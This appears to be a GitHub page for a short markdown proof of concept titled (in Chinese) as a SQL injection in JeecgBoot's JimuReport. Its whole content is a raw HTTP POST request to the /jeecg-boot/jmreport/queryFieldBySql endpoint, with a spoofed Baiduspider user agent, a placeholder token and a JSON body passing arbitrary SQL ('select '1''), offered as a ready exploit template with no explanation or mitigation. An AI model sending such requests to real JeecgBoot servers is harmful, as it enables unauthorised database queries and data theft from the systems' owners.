Skip to content

Files

Latest commit

Aug 6, 2024
dca4284 · Aug 6, 2024

History

History
15 lines (13 loc) · 413 Bytes

JeecgBoot积木报表存在SQL注入.md

File metadata and controls

15 lines (13 loc) · 413 Bytes
POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.131.100:8088
Content-Length: 21

{"sql":"select '1' "}